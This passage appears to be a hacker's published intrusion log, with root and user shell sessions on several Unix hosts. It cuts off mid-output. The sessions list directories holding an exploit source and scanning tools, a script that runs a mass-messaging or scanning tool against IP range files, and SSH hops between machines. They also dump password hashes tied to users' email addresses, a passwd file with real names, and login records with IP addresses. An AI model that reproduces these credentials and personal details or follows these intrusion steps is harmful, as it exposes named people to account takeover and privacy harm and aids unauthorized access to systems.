Nov 7 2003 .klogin -rw-r--r-- 1 root wheel 297 Nov 7 2003 .login -rw------- 1 root wheel 0 Nov 7 2003 .mysql_history -rw-r--r-- 1 root wheel 251 Nov 7 2003 .profile -rw------- 1 root wheel 1024 Dec 4 2003 .rnd drwx------ 2 root wheel 512 Nov 19 2003 .ssh drwxr-xr-x 3 root wheel 512 Jul 12 2005 bah -rw-r--r-- 1 root wheel 2553724 Feb 13 14:57 blH -rw-r--r-- 1 root wheel 15769700 Jan 12 20:27 blah -rw-r--r-- 1 root wheel 6968847 Oct 7 2005 mails.txt drwxr-xr-x 2 root wheel 512 Jun 6 2005 nsb drwxr-xr-x 3 root wheel 512 May 14 2005 omailweb drwxr-xr-x 5 root wheel 512 Aug 11 2005 qmail drwxr-xr-x 2 root wheel 512 Mar 23 01:54 spl0it -r-xr-xr-x 1 root wheel 78964 Aug 11 2005 sysctl drwxr-xr-x 94 3001 wheel 3584 Nov 8 2003 webmin-1.121 [root@theamericanunderground] # ls -al spl0it total 6900 drwxr-xr-x 2 root wheel 512 Mar 23 01:54 . drwxr-xr-x 10 root wheel 512 Jul 13 09:16 .. -rwxrwxrwx 1 root wheel 19552 Mar 23 01:54 nsb -rwxrwxrwx 1 root wheel 80 Mar 23 01:54 run -rw-r--r-- 1 root wheel 7006564 Mar 23 01:56 us.range -rw-r--r-- 1 root wheel 8772 Jun 6 2005 x86-kmem_inject.c [root@theamericanunderground] # head spl0it/x86-kmem_inject.c /* * remote /dev/mem injection shellcode * rjohnson@uninformed.org * **************************************************************************** * Warning: Make sure you read the notes before you run this code! **************************************************************************** * * This program will fork a client/server to test the kmem_inject shellcode * The server listens on DEFAULT_PORT and executes the kernel infection [root@theamericanunderground] # cat .ssh/known_hosts ica.innerpulse.com,66.135.33.141 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA5isJuCsNwX20hYidJe2ovfhfQkQyZx69YLyDC+tZTsGHz/0p7B1azP7n2T2NlBY8n5HkYUxeE0pyA//k7Qy7uZHYhNqVV2/xUBPWAKU3z6cRCOMt2cKR7iqAVhBueka9EyOKPvQuEZTWQwm6n623TD3dbZnq4aTymPMFGt/rz1s= 218.66.104.133 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArGzIaeedyHXJ6cjKhthH2q0UlK8VQ8TkHvL0vnUYQ6KPKwyKx8MlBBQfv3mrXEhpJ2xARruZZomCb5vIDSitoauqU7To26FpEFQ1HOVZV5bB4RSjtLccB8V9PGpdyrpX/WHEw40DXI4SLSi2Z2hDHN80y1zRdBsKTv5c/kW9iI0= localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM= mindshadow.net,208.187.81.33 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U= dat0rgat0r.mindshadow.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U= 61.152.158.111 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAk4wL7Cq072Z8ER8bJQuopq9/ctykSg5x06B2Gfs1ADchYYIk5nO1xrLOoeM3X3PjxmmxB+WLSd/HhrdRrPjXpAV+JRSfMprzxUMQ8hFG3iwL6qFU+Oe4nIf0kdoujubkLXWeIA5UfwFnLCRMYqfYP6Yjo3WhemKZY1jpzmoDb/M= 61.129.115.90 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3TlY7zCK+PkRD6ZbbJN4O8t6nKz7Csosb95lwqi3mI10XjRECRpLEjz+Q7fcilrn+pUig0dSjAf6lpgOBUFhIgjPEp6RLDxJ/GS/DYmpvXnfGqYCYvE0AXx/Kl01RQizzBRsp1hcxLfq9hSpuHhdWsdolGUwFl0IY0f6W3GVOXk= kizmiaz.dis.org,216.240.45.60 ssh-dss AAAAB3NzaC1kc3MAAACBAKjbFRzf4b/qq9gvF2GIW6hTXR6uFuho3acyrEB0jNp4xWdKjxyaLBGVQj4w9pdlJgCI+RKM1kUaE1pM1HpHpQGvsBmKEfc64+vuGe48ltAMRNczKFawVhvPOoPzinkMF7IJaUe/PH3nEKQViAoODKX72HLhYPInAX2tyLdfehjBAAAAFQCTcZUslELJmWaDVAsAxH95FFvffwAAAIARgJS3f/9zTaNY8N3hFQEaQdnGl0hXcPvXgKAcT7BHBgDR7IzmGVXHZOn0oy93HRPGxzFZsIbiFW3Xv0ldw7fdEnDy6bgG8BNaXphCf1CaWpIaAeWVXL78qTWxXOyodIsVFTRMsQ1IYb7CutGpxY27GzigChGGx3plt0GXpvmvAwAAAIEAhBW3U7fjQ87TTvFJkYqvsUP8B/PRtFHHUG8Y54c0CRsUSHs5aYRycVNrW5o9YQXSfXPy1pqNJ4UnpN88zQ41zMEknButTasYlooagV+XdcX8q2annjjOXRTKeh8exCjjIYbWxN3cf32L6tbM7wzg6m2XacCa5YUFTVUgCEIY0c0= theamericanunderground.com,66.235.215.176 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM= 67.138.244.8 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzJar3YuhtBMS+w9TYUi70u0IOHaXaBIdCCHd1JIEO9agavqIKy/ydGUnUbhKDZtP4H4tE7ud3igESX01MpW6bSF5VBS4sNls4z5rPi66zbg4AYepcpv9k5w+lu353vBvIqiaQwLdU1FdLRWq/GpjYrPSPK0VlMgCF82piHme33U= 221.203.145.73 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAud9IJCUrFgTwi5RgrSkVs5ujoQlyMpdatsX9HEj/ilhpCsN8pkpsvAfkHoxrneQevveLNYgoU1skgYBqk5rIha4px/6W/uCT3R81mi+T8vnEk5dbzoXdKmkXFfYoJSwJ4SAkYtj+73McajvAaQni4Qhg39sQLxRAbe+PyMthTqk= vh56.ipowerweb.com,66.235.215.182 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoNwczdPNgAl9kpOGX+sCispQz0mGej1uX1PTKFj9YRwzMyBJUOT8CDui++QCyuZFgG8meIAcoywLRgdh8nJ6EFatVAged6rlltrgrXQ1s4tm500cAnR+p3SKQa50Yd4kJvuwzkYPjmOFl7ZrM3s+ulg1/DnXvoJdYW5BpqBd3LM= [root@theamericanunderground] # ls -al /home/ ctotal 26 drwxr-xr-x 13 root wheel 512 Apr 18 05:20 . drwxr-xr-x 17 root wheel 512 Aug 11 2005 .. drwxr-xr-x 3 au au 512 Jul 12 22:59 au drwxr-xr-x 3 dan dan 512 May 19 2005 dagger drwxr-xr-x 3 dan dan 512 Apr 18 04:07 dan drwxr-xr-x 4 fwm fwm 512 Jul 13 00:28 fwm drwxr-xr-x 3 root wheel 512 Nov 10 2003 httpd drwxr-xr-x 4 iphear iphear 512 Jun 26 23:26 iphear drwxr-xr-x 5 joker joker 512 Nov 2 2005 joker drwxr-xr-x 2 oklet oklet 512 Apr 18 05:38 oklet drwxr-xr-x 3 sftrr sftrr 512 Oct 29 2005 sftrr drwxr-xr-x 3 webmail webmail 512 Nov 11 2003 test1 drwxr-xr-x 2 webmail webmail 512 May 14 2005 webmail [root@theamericanunderground] # strings /home/fwm/passwd.cdb mailer-daemon postmaster@ 1116054186 postmaster postmaster@ 1116054186 root $1$HmkOnLag$0tYRMWtIJ4Re7P6lizyVx. postmaster@ 1116054186 enrique $1$GEIBJpzM$8mB6tdAxycBEJlfa9m3bh. ./users/enrique 1116054211 enrique@dis.org enrique 1116054266 info $1$GX7JdfG0$SlTWqAndT8KnvvV3K0CDX. aaron 1116054297 jamaal $1$qDN5h1mu$Bfy8Tcu4UB5NmlZvvefjz0 ./users/jamaal 1116057014 aaron $1$Xb/McAGE$M4APB64nC4LaQcf3tNRM3. ./users/aaron 1116057484 $1$X4XQKYz.$2wz07oYxz3R/yBRcvcpe01 ./users/dan drayjewell@earthlink.net 1116270912 $1$PsLRAfdL$U9SJeI5uKfXwvK6oY3j65. ./users/kim kdwilliams35@yahoo.com 1116270951 michael $1$y7wxJmY/$w55P3Rl8BOxNrt31Qw2qZ/ ./users/michael shownoquarter@gmail.com 1152750386 todd $1$qn1FgMbD$NdITqScfuhIPHmTN4rnuK. ./users/todd todd@toddblackphotography.com 1152750431 88T? q|l [root@theamericanunderground] # head /home/oklet/freaky.list 12.0.0.0 12.0.255.255 12.100.0.0 12.100.255.255 12.10.0.0 12.10.255.255 12.1.0.0 12.1.255.255 12.101.0.0 12.101.255.255 12.102.0.0 12.102.255.255 12.103.0.0 12.103.255.255 12.104.0.0 12.104.255.255 12.105.0.0 12.105.255.255 12.106.0.0 12.106.255.255 [root@theamericanunderground] # cat /home/oklet/run #!/bin/sh for i in xaa xab xac xad; do ./nsb 1 1 SYSTEM ALERT 1 150 $i & done [root@theamericanunderground] # ssh erik@dat0rgat0r.mindshadow.net [erik@dat0rgat0r] $ id uid=1016(erik) gid=100(users) groups=14(uucp),16(dialout),17(audio),33(video),100(users) [erik@dat0rgat0r] $ uname -a Linux beckyruxpin 2.6.5-7.202.7-smp #1 SMP Tue Nov 29 14:32:53 UTC 2005 i686 i686 i386 GNU/Linux [erik@dat0rgat0r] $ ls -al total 78659 drwxr-xr-x 27 erik users 1976 2006-01-16 22:33 . drwxr-xr-x 21 root root 528 2005-12-13 04:36 .. drwxr-xr-x 2 erik users 168 2005-07-09 17:50 080705 drwxr-xr-x 2 erik users 72 2005-08-17 22:14 300 -rw-r--r-- 1 erik users 37463932 2005-07-23 20:24 300hugh -rw-r--r-- 1 erik users 12926192 2005-07-06 13:33 300master -rw------- 1 erik users 11754 2006-01-16 15:28 .bash_history -rw-r--r-- 1 erik users 1286 2005-01-31 20:35 .bashrc drwx------ 3 erik users 104 2005-06-06 04:41 .BitchX -rw-r--r-- 1 erik users 0 2005-05-16 13:35 classB.list -rw-r--r-- 1 erik users 601960 2005-05-22 12:21 country.tar.bz2 -rw-r--r-- 1 erik users 1015808 2005-06-06 21:47 downloadme.tar.gz.bz2 -rw-r--r-- 1 erik users 208 2005-01-31 20:35 .dvipsrc -rw-r--r-- 1 erik users 0 2005-09-02 04:08 E -rw-r--r-- 1 erik users 1637 2005-01-31 20:35 .emacs -rw-r--r-- 1 erik users 1124 2005-01-31 20:35 .exrc -rw-r--r-- 1 erik users 337642 2005-08-30 10:14 fin.log -r--r--r-- 1 erik users 8187 2005-12-15 15:17 .fishsrv.pl drwxr-xr-x 2 erik users 48 2005-01-31 20:35 .fonts drwxr-xr-x 2 erik users 72 2005-07-20 16:37 freaky072005 drwxr-xr-x 2 erik users 136 2005-06-30 19:17 freakynewlogs -rw-r--r-- 1 erik users 97698 1999-08-16 17:13 fts-rvscan.v1-r1.tgz -rw-r--r-- 1 erik users 44 2005-08-17 18:26 fwmservers -rw-r--r-- 1 erik users 1937306 2005-07-08 00:10 gbnew drwxr-xr-x 2 erik users 256 2005-07-18 15:00 gkdh drwxr-xr-x 3 erik users 104 2005-05-22 12:42 global drwxr-xr-x 2 erik users 48 2006-01-11 02:55 ica drwxr-xr-x 2 erik users 168 2005-08-23 00:41 ipplset -rw-r--r-- 1 erik users 7476605 2005-05-17 02:51 ipplsorted.bz2 -rw-r--r-- 1 erik users 43226 2005-08-31 06:33 ip_range_gov_mil_fbi_cia.txt drwxr-xr-x 2 erik users 264 2005-07-23 13:07 iua -rw-r--r-- 1 erik users 164 2005-01-31 20:35 .kermrc drwxr-xr-x 2 erik users 48 2005-07-23 13:14 logs -rw------- 1 erik users 3011 2005-06-07 14:29 mbox -rwxr-xr-x 1 erik users 0 2005-07-03 15:51 mega drwxr-xr-x 2 erik users 256 2005-10-20 00:23 misc -rw-r--r-- 1 erik users 6148 2005-01-31 20:35 .muttrc -rwxr-xr-x 1 erik users 276 2005-06-20 12:38 neekclassb -rwxrwxrwx 1 erik users 278 2005-05-17 02:56 neekclassc -rw-r--r-- 1 erik users 7005938 2005-05-17 17:13 neekippl drwxr-xr-x 3 erik users 72 2005-05-26 04:37 new -rw-r--r-- 1 erik users 2119482 2005-05-15 06:09 newlist.bz2 drwxr-xr-x 2 erik users 288 2005-06-06 03:19 newlocallogs drwxr-xr-x 4 erik users 176 2005-06-10 16:18 newnewnewnew drwxr-xr-x 4 erik users 120 2005-06-08 00:24 newservers drwxr-xr-x 7 erik users 2760 2005-06-06 02:28 nmap-3.30 -rwxr-xr-x 1 erik users 1129443 2005-06-06 02:21 nmap-3.30.tgz -rwxrwxrwx 1 erik users 19552 2006-01-05 00:17 nsb -rw-r--r-- 1 erik users 573691 2005-09-17 12:42 NTFS.SYS -rw-r--r-- 1 erik users 0 2005-09-02 04:08 O drwxr-xr-x 2 erik users 96 2005-09-17 10:26 partimage -rw-r--r-- 1 erik users 934 2005-01-31 20:35 .profile drwxr-xr-x 2 erik users 80 2005-01-31 20:35 public_html drwxr-xr-x 2 erik users 224 2005-07-06 13:12 rangefiles drwxr-xr-x 2 erik users 136 2005-11-16 13:12 scripts -rw-r--r-- 1 erik users 124 2005-07-11 08:09 serverinfo drwx------ 2 erik users 80 2005-09-20 10:36 .ssh -rw-r--r-- 1 erik users 7005938 2005-05-17 02:59 udplocal -rw-r--r-- 1 erik users 246784 2005-06-07 22:43 udplog -rw-r--r-- 1 erik users 246598 2005-05-19 00:28 uk.list -rw-r--r-- 1 erik users 311 2005-01-31 20:35 .urlview -rw------- 1 erik users 5042 2006-01-05 00:19 .viminfo drwxr-xr-x 2 erik users 176 2005-06-06 02:59 .vnc -rw------- 1 erik users 267 2005-09-22 13:06 .Xauthority -rw-r--r-- 1 erik users 7913 2005-01-31 20:35 .xcoralrc drwxr-xr-x 2 erik users 72 2005-01-31 20:35 .xemacs -rw-r--r-- 1 erik users 4414 2005-01-31 20:35 .xim.template -rwxr-xr-x 1 erik users 3055 2005-01-31 20:35 .xinitrc.template -rw-r--r-- 1 erik users 231 2005-08-31 06:34 XOT_active.txt -rw-r--r-- 1 erik users 119 2005-01-31 20:35 .xtalkrc -rw-r--r-- 1 erik users 68361 2005-07-01 12:29 zanzau [erik@dat0rgat0r] $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false mysql:x:60:2:MySQL database admin:/var/lib/mysql:/bin/false sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false ntp:x:74:65534:NTP daemon:/var/lib/ntp:/bin/false vdr:x:100:33:Video Disk Recorder:/var/spool/video:/bin/false nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash mindshadow:x:1000:100:MindShadow:/home/mindshadow:/bin/bash lynn:x:1001:100:Lynn M Wallenstein:/home/lynn:/bin/bash liz:x:1002:100:Liz Wallenstein:/home/liz:/bin/bash bill:x:1003:100:William Wallenstein:/home/bill:/bin/bash onegin:x:1005:100:Will:/home/onegin:/bin/bash codedbliss:x:1006:100:Bruce:/home/codedbliss:/bin/zsh mjhorney:x:1009:100:Mikey:/home/mjhorney:/bin/bash lora:x:1010:100:Lora Wallenstein:/home/lora:/bin/bash mazhar:x:1011:100:Mazhar Pathan:/home/mazhar:/bin/bash saif:x:1012:100:Saif Pathan:/home/saif:/bin/bash heather:x:1013:100:Heather Harris:/home/heather:/bin/bash chad:x:1014:100::/home/chad:/bin/bash bruce:x:1015:100::/home/bruce:/bin/zsh erik:x:1016:100:erik:/home/erik:/bin/bash joe:x:1018:100::/home/joe:/bin/bash lwallenstein:x:1019:100:Lynn Wallenstein:/home/lwallenstein:/bin/bash pawallenstein:x:1020:100:Patricia Wallenstein:/home/pawallenstein:/bin/bash hobremski:x:1021:100:Heather O'Bremski:/home/hobremski:/bin/bash man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash [erik@dat0rgat0r] $ ssh enrique@kizmiaz.dis.org enrique@kizmiaz.dis.org's password: [enrique@kizmiaz] $ w 6:05AM up 39 days, 10:46, 5 users, load averages: 0.02, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE WHAT dover p0 216.240.45.19 Wed01AM 15:37 -csh (csh) gessel p1 c-24-62-5-193.hs 1:10AM 4:55 -csh (csh) shipley p2 216.240.45.19 Tue11AM 16:27 -csh (csh) shipley p3 216.240.45.19 Thu06PM 12:02 -csh (csh) enrique p4 ip70-180-216-196 2:33AM 43 bash [enrique@kizmiaz] $ ls -al total 34530 drwxr-xr-x 11 enrique enrique 2048 Dec 23 05:21 . drwxr-xr-x 149 root wheel 3072 Dec 10 07:32 .. drwx------ 3 enrique enrique 512 Dec 15 2003 .BitchX -rw------- 1 enrique enrique 122 Sep 19 17:21 .Xauthority -rw-r--r-- 1 enrique enrique 141 Feb 3 2005 .addressbook -rw------- 1 enrique enrique 2513 Feb 3 2005 .addressbook.lu -rw-r--r-- 1 enrique enrique 28 Sep 27 2001 .bitchxrc drwx------ 2 enrique enrique 1024 Mar 13 2005 .bsflog -rw-r--r-- 1 enrique enrique 494 Sep 27 2001 .cpsave -rw-r--r-- 1 enrique enrique 628 Mar 5 2001 .cshrc -rw-r--r-- 1 enrique enrique 179 Sep 27 2001 .cyp.col -rw-r--r-- 1 enrique enrique 287 Sep 27 2001 .cyp.fsave lrwxr-xr-x 1 enrique enrique 9 Mar 15 2005 .history -> /dev/null -rw-r--r-- 1 enrique enrique 299 Mar 5 2001 .login -rw-r--r-- 1 enrique enrique 160 Sep 27 2001 .login_conf -rw------- 1 enrique enrique 371 Mar 5 2001 .mail_aliases -rw-r--r-- 1 enrique enrique 331 Mar 5 2001 .mailrc -rw-r--r-- 1 enrique enrique 11 Jan 11 2005 .mh_profile -rw------- 1 enrique enrique 1683 Dec 9 16:52 .pine-interrupted-mail -rw-r--r-- 1 enrique enrique 17478 Dec 1 09:15 .pinerc -rw-r--r-- 1 enrique enrique 722 Mar 5 2001 .profile -rw------- 1 enrique enrique 276 Mar 5 2001 .rhosts -rw-r--r-- 1 enrique enrique 852 Mar 5 2001 .shrc drwxr-xr-x 2 enrique enrique 512 Dec 22 14:44 .ssh -rw-r--r-- 1 enrique enrique 7287 Jul 26 2003 1A3.jpg -rw-r--r-- 1 enrique enrique 8293 Oct 3 2001 990.b0red.bx -rw-r--r-- 1 enrique enrique 120054 Sep 26 2001 BECKYC~1.JPG -rw-r--r-- 1 enrique enrique 242343 Sep 26 2001 BECKYC~2.JPG -rw-r--r-- 1 enrique enrique 6737 Dec 23 05:20 Geoffraie.zip -rw-r--r-- 1 enrique enrique 57 Nov 12 23:51 HOLYBATHOOTERS -rw-r--r-- 1 enrique enrique 18307 Aug 11 19:33 Increase_in_the_tax.rar -rw-r--r-- 1 enrique enrique 19968 Apr 17 2005 Links.doc drwx------ 2 enrique enrique 512 Jan 11 2005 Mail -rw-r--r-- 1 enrique enrique 449 Apr 21 2005 Makefile -rw-r--r-- 1 enrique enrique 26624 Feb 14 2005 RecordingServices.doc -rw-r--r-- 1 enrique enrique 26112 Apr 17 2005 Salon Blow Again.doc -rw-r--r-- 1 enrique enrique 31232 Apr 17 2005 Services.doc -rw-r--r-- 1 enrique enrique 1376 Apr 18 2005 ass.irc -rw-r--r-- 1 enrique enrique 13858 Feb 7 2005 asskey.txt -rw-r--r-- 1 enrique enrique 1339 Feb 8 2005 awin.bx -rw-r--r-- 1 enrique enrique 1029538 Feb 7 2005 bigmatix.txt drwxr-xr-x 4 enrique enrique 512 Jan 30 2005 bsflite-0.72 -rw-r--r-- 1 enrique enrique 34446 Jan 30 2005 bsflite-0.72.tar.gz -rw-r--r-- 1 enrique enrique 23 May 29 2005 cab -rw-r--r-- 1 enrique enrique 322619 Mar 5 2005 calendar_glance.jpg -rw-r--r-- 1 enrique enrique 83156 May 16 2005 classB.list -rw-r--r-- 1 enrique enrique 601960 May 21 2005 country.tar.bz2 drwxr-xr-x 10 enrique enrique 512 Oct 21 2001 cyp -rw------- 1 enrique enrique 601 Oct 10 15:04 dead.letter -rw------- 1 enrique enrique 20464259 Dec 10 03:51 enrique.sav.gz -rw-r--r-- 1 enrique enrique 739840 Jun 27 2003 forhazel.zip -rw-r--r-- 1 enrique enrique 203186 May 18 2005 gb.list -rw-r--r-- 1 enrique enrique 2591 Sep 26 2001 google.pl -rw-r--r-- 1 enrique enrique 1071659 Dec 18 2003 images.zip -rw-r--r-- 1 enrique enrique 1252 Jul 14 22:24 index.html?hop=fixmyreg -rw-r--r-- 1 enrique enrique 1252 Sep 2 20:04 index.html?hop=fixmyreg.1 -rw-r--r-- 1 enrique enrique 106770 May 18 2005 iplist -rw-r--r-- 1 enrique enrique 7476605 May 17 2005 ipplsorted.bz2 -rw-r--r-- 1 enrique enrique 4 May 4 2005 ips -rw-r--r-- 1 enrique enrique 531 May 3 2005 ips.php -rw-r--r-- 1 enrique enrique 37692 Apr 6 2002 lice.irc -rw-r--r-- 1 enrique enrique 164031 Apr 6 2002 lice.tar.gz drwxr-xr-x 2 enrique enrique 512 May 15 2005 log drwx------ 2 enrique enrique 512 Dec 13 17:50 mail drwx------ 2 enrique enrique 512 Dec 22 15:59 metamail_tmp -rw-r--r-- 1 enrique enrique 930 Apr 18 2005 mexico.irc -rw-r--r-- 1 enrique enrique 2119482 May 15 2005 newlist.bz2 lrwxr-xr-x 1 root enrique 30 Mar 5 2001 public_html -> /html/docs/www.dis.org/enrique -rw-r--r-- 1 enrique enrique 33792 Apr 28 2003 resume.doc -rw-r--r-- 1 enrique enrique 31 Sep 15 07:34 sheena.txt -rw-r--r-- 1 enrique enrique 1599 Dec 14 13:58 sheenasucks -rw-r--r-- 1 enrique enrique 2812 Dec 14 14:38 stuff -rw------- 1 enrique enrique 1847 Mar 29 2005 stuff.save -rw-r--r-- 1 enrique enrique 866 Apr 15 2005 swazi.irc -rw-r--r-- 1 enrique enrique 81031 May 7 2000 warez.txt.gz -rw-r--r-- 1 enrique enrique 1706 Jun 10 2005 wget-log [enrique@kizmiaz] $ cd .BitchX [enrique@kizmiaz] $ ls -al total 134 drwx------ 3 enrique enrique 512 Dec 15 2003 . drwxr-xr-x 11 enrique enrique 2048 Dec 23 05:21 .. -rw-r--r-- 1 enrique enrique 98777 Sep 27 2001 BitchX.away -rw-r--r-- 1 enrique enrique 13905 Sep 27 2001 BitchX.formats -rw-r--r-- 1 enrique enrique 3564 Sep 27 2001 BitchX.sav drwx------ 2 enrique enrique 512 Mar 5 2001 screens [enrique@kizmiaz] $ w 2:34PM up 38 days, 19:14, 7 users, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT dover p0 216.240.45.19 Wed01AM 5 -csh (csh) bifrost p1 server01.minions Wed11AM 2:49 pine -i shipley p2 216.240.45.19 Tue11AM 56 -csh (csh) gessel p3 c-24-62-5-193.hs 5:42AM 8:51 -csh (csh) aloke p4 adsl-71-131-204- 12:16PM 1:24 -csh (csh) enrique p6 oes21.com 1:20PM 1:12 more gessel p7 MACLAURIN-FOURTE 2:11PM 22 -csh (csh) [enrique@kizmiaz] $ last gessel ttyp7 18.80.6.148 Thu Dec 22 14:11 still logged in enrique ttyp7 67.138.244.8 Thu Dec 22 14:05 - 14:08 (00:03) enrique ttyp6 67.138.244.8 Thu Dec 22 13:20 still logged in aloke ttyp4 71.131.204.173 Thu Dec 22 12:16 still logged in ftp ftp 172.182.129.160 Thu Dec 22 06:57 - 06:57 (00:00) gessel ttyp3 24.62.5.193 Thu Dec 22 05:42 still logged in gessel ttyp4 24.62.5.193 Wed Dec 21 21:21 - 21:49 (00:27) aloke ttyp4 71.131.204.173 Wed Dec 21 16:26 - 17:33 (01:07) gessel ttyp3 24.62.5.193 Wed Dec 21 12:32 - 22:42 (10:09) bifrost ttyp1 209.237.225.2 Wed Dec 21 11:57 still logged in enrique ttyp1 70.180.216.196 Wed Dec 21 07:02 - 08:20 (01:17) dover ttyp0 216.240.45.19 Wed Dec 21 01:14 still logged in gessel ttyp1 24.62.5.193 Tue Dec 20 22:36 - 01:26 (02:49) gessel ttyp3 24.62.5.193 Tue Dec 20 21:17 - 23:27 (02:10) bifrost ttyp1 209.237.225.2 Tue Dec 20 19:28 - 21:41 (02:13) gessel ttyp3 66.174.93.103 Tue Dec 20 14:37 - 15:38 (01:00) shipley ttyp2 216.240.45.19 Tue Dec 20 11:57 still logged in aloke ttyp0 71.132.19.198 Tue Dec 20 11:08 - 23:18 (12:10) bitrush ttyp0 66.129.224.36 Tue Dec 20 09:23 - 09:24 (00:01) gessel ttyp3 66.93.181.147 Mon Dec 19 22:36 - 07:26 (08:49) gessel ttyp4 66.93.181.147 Mon Dec 19 17:44 - 22:02 (04:18) bifrost ttyp1 209.237.225.2 Mon Dec 19 16:45 - 19:19 (1+02:34) bifrost ttyp1 209.237.225.2 Mon Dec 19 16:44 - 16:44 (00:00) enrique ttyp4 70.180.216.196 Mon Dec 19 14:39 - 17:44 (03:04) aloke ttyp3 71.132.19.198 Mon Dec 19 10:53 - 20:54 (10:00) bifrost ttyp1 209.237.225.2 Mon Dec 19 10:48 - 16:05 (05:17) db_cooper ttyp1 24.23.217.85 Mon Dec 19 09:41 - 09:42 (00:01) dover ttyp0 216.240.45.19 Mon Dec 19 06:06 - 06:43 (1+00:37) shipley ttyp2 216.240.45.19 Mon Dec 19 03:18 - 06:43 (1+03:25) gessel ttyp0 69.69.90.2 Mon Dec 19 01:36 - 03:46 (02:10) ftp ftp 220.226.171.250 Mon Dec 19 00:48 - 00:50 (00:02) ftp ftp 66.249.66.232 Mon Dec 19 00:43 - 00:45 (00:02) ftp ftp 66.249.66.232 Mon Dec 19 00:41 - 00:43 (00:02) enrique ttyp2 66.235.215.176 Sun Dec 18 16:11 - 20:12 (04:01) enrique ttyp2 70.180.216.196 Sun Dec 18 10:47 - 10:48 (00:00) enrique ttyp2 70.180.216.196 Sun Dec 18 06:05 - 09:48 (03:43) ftp ftp 66.249.66.232 Sun Dec 18 04:35 - 04:39 (00:04) ftp ftp 66.249.66.232 Sun Dec 18 04:33 - 04:35 (00:02) ftp ftp 66.249.66.232 Sun Dec 18 04:32 - 04:32 (00:00) ftp ftp www.vcgg.com Sat Dec 17 20:23 - 20:23 (00:00) enrique ttyp2 66.235.215.176 Sat Dec 17 17:18 - 06:05 (12:46) ftp ftp 66.249.66.232 Sat Dec 17 14:51 - 14:53 (00:02) ftp ftp 66.249.66.232 Sat Dec 17 13:06 - 13:08 (00:02) enrique ttyp2 67.138.244.8 Sat Dec 17 06:55 - 08:20 (01:24) bifrost ttyp1 209.237.225.2 Sat Dec 17 01:33 - 05:43 (2+04:10) ftp ftp dau-new.chg.ru Sat Dec 17 00:50 - 00:50 (00:00) bifrost ttyp6 209.237.230.227 Fri Dec 16 18:01 - 18:01 (00:00) gessel ttyp4 69.69.90.2 Fri Dec 16 17:02 - 19:12 (02:10) ftp ftp www.vcgg.com Fri Dec 16 14:43 - 14:43 (00:00) ftp ftp www.vcgg.com Fri Dec 16 14:42 - 14:43 (00:00) gessel ttyp4 69.69.90.2 Fri Dec 16 14:35 - 14:43 (00:08) ftp ftp 84.146.180.185 Fri Dec 16 13:50 - 13:51 (00:00) aloke ttyp2 71.132.19.198 Fri Dec 16 10:37 - 18:47 (08:09) cassiel ttyp6 68.127.162.214 Thu Dec 15 23:09 - 23:11 (00:02) cassiel ttyp4 68.127.162.214 Thu Dec 15 22:56 - 01:17 (02:20) gessel ttyp2 66.174.92.162 Thu Dec 15 21:13 - 23:51 (02:37) dover ttyp3 216.240.45.19 Thu Dec 15 17:28 - 23:51 (3+06:22) db_cooper ttyp6 24.23.217.85 Thu Dec 15 15:07 - 15:10 (00:02) enrique ttyp4 70.180.216.196 Thu Dec 15 15:04 - 19:33 (04:29) gessel ttyp3 208.54.95.129 Thu Dec 15 13:42 - 15:58 (02:16) aloke ttyp2 71.131.208.119 Thu Dec 15 10:04 - 18:03 (07:58) gessel ttyp2 66.174.93.98 Thu Dec 15 07:24 - 09:33 (02:08) gessel ttyp3 208.54.95.129 Thu Dec 15 04:57 - 07:07 (02:10) gessel ttyp2 208.54.95.129 Thu Dec 15 04:14 - 06:33 (02:19) ftp ftp 62.57.9.78 Thu Dec 15 